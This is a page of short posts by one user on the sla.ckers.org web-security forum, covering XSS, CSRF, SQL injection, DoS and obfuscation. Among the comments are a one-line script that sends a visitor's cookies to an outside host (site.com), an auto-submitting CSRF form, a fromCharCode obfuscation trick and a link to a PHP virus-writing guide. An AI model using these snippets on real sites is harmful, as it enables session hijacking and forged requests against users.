Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Current Page: 1 of 4
Results 1 - 30 of 111
4 years ago
backbone
The data returned by an ajax call is a string, so you can extract what you need through regular expressions. If you truly would like to access the form through DOM you should load the page in an iframe, and not by retrieving it via ajax calls.
Forum: XSS Info
4 years ago
backbone
nil
Forum: Full Disclosure
4 years ago
backbone
Someone took "hits from the bong"...
Forum: SQL and Code Injection
4 years ago
backbone
You're definitely a Perl guy... There are a couple of things you could change in it before spreading it:
1. For big files file() is expensive and slow.
2. You are not locking banned.txt when writing to it.
3. If you want to stop execution after alerting banned to the user, just use return false instead of $do = 'no', or better yet just exit()
4. You know that at the same time you can have s
Forum: Projects
4 years ago
backbone
maybe because there is a referrer check?
Forum: CSRF and Session Info
4 years ago
backbone
@Gareth:
> 4. Use htmlentities without the ENT_QUOTE option
ehm, why? PoC code?
Forum: XSS Info
4 years ago
backbone
The easiest way would be through the POP3 protocol. POP3 PHP Class -> http://www.phpclasses.org/browse/file/3.html
Forum: Robots/Spiders/CAPTCHAs, oh my
5 years ago
backbone
Anonymous is not a group of hacky activists... Anonymous is legion!
Forum: DoS
5 years ago
backbone
well it's a joke, like most Microsoft software :)
Forum: News and Links
5 years ago
backbone
I'm rather astounded that nobody mentioned the javascript threading which can be achieved with Firefox 3.5... I've conducted an experiment to test the DoSness of them, but it's rather inconclusive. I've managed to crash Firefox in a couple of instances, only when executing other activities in parallel with the thread "bomber"... as mentioned it didn't always work... Of course the m
Forum: DoS
5 years ago
backbone

Forum: Obfuscation
5 years ago
backbone

Forum: Obfuscation
5 years ago
backbone
I was thinking about GnuPG but then you mentioned IIS... does PHP work under it?
Forum: Projects
5 years ago
backbone
<form action="target.url" method="post">
  <input type="text" name="mail" value="xss-vector" />
</form>
<script type="text/javascript">document.forms[0].submit();</script>
is this what you're after? If not then try being more explicit
Forum: XSS Info
5 years ago
backbone
today is Casino Day... it's the third time today the same casino spam has been caught by akismet
> Hi respected forum members, I present you a unknown casino in which you will consider on your own any games and build deck balcony house . We have a bountiful network of casino in Canada, USA, France and other countries, and decided to unqualified a new internet-casino! We demand defer game
Forum: OMG Ponies
5 years ago
backbone
> ['string']
> window['String']['fromCharCode'](115,116,114,105,110,103)
> {a:'string'}
Forum: Obfuscation
5 years ago
backbone
it actually was a spam comment:
Forum: OMG Ponies
5 years ago
backbone
Here's my twitter account, who knows I may even post something you're interested in http://twitter.com/dblackshell
Forum: News and Links
5 years ago
backbone
PaPPy Wrote:
-------------------------------------------------------
> (...)
> but i am really curious what will trigger a
> report, if it's xss (persistent and non
> persistent), or malware, java? swf?
> (...)
It protects your BROWSER against possible exploitation of known or unknown BROWSER vulnerabilities.
Forum: News and Links
5 years ago
backbone
nobody said to load /bin/bash through SQLi. They said to load the .bash_history file... :)
Forum: SQL and Code Injection
5 years ago
backbone
What do you mean by "English International standard"? For converting from one charset to another you could use iconv http://www.php.net/manual/en/function.iconv.php . Google: XSS and UTF-7, for an example... regarding to db, the only one I know is from shiflett's article http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string, but as told there proper escapi
Forum: SQL and Code Injection
5 years ago
backbone
it didn't work for me... looked through the source and haven't seen anything malefic in it... (oh, and it's for digg only)
Forum: Robots/Spiders/CAPTCHAs, oh my
5 years ago
backbone
I'm more of a virus type, an old school PHP virus (writing guide), nothing fancy http://vx.org.ua/29a/29a-7/Articles/29A-7.020
Forum: XSS Info
5 years ago
backbone
pixy, spike, rats... google anyone?
Forum: SQL and Code Injection
5 years ago
backbone
well I googled the error (go figure) and not the data type seems to be the problem, check out this.
Forum: SQL and Code Injection
5 years ago
backbone
> When you use CAST to convert a CLOB value into a character datatype or a BLOB value into the RAW datatype, the database implicitly converts the LOB value to character or raw data and then explicitly casts the resulting value into the target datatype. If the resulting value is larger than the target type, then the database returns an error.
I'm not familiar with Oracle, but I think the rever
Forum: SQL and Code Injection
5 years ago
backbone
use the CAST function http://download.oracle.com/docs/cd/B19306_01/server.102/b14200/functions016.htm
Forum: SQL and Code Injection
5 years ago
backbone
findstr or wingrep :P
Forum: SQL and Code Injection
5 years ago
backbone
I use to do it without iframes
new Image().src="http://site.com/script.php?pew="+encodeURI(document.cookie);
Forum: CSRF and Session Info
5 years ago
backbone
I double thrill's offer... and on top of that I'll click on adsense banner of your choice.
Forum: SQL and Code Injection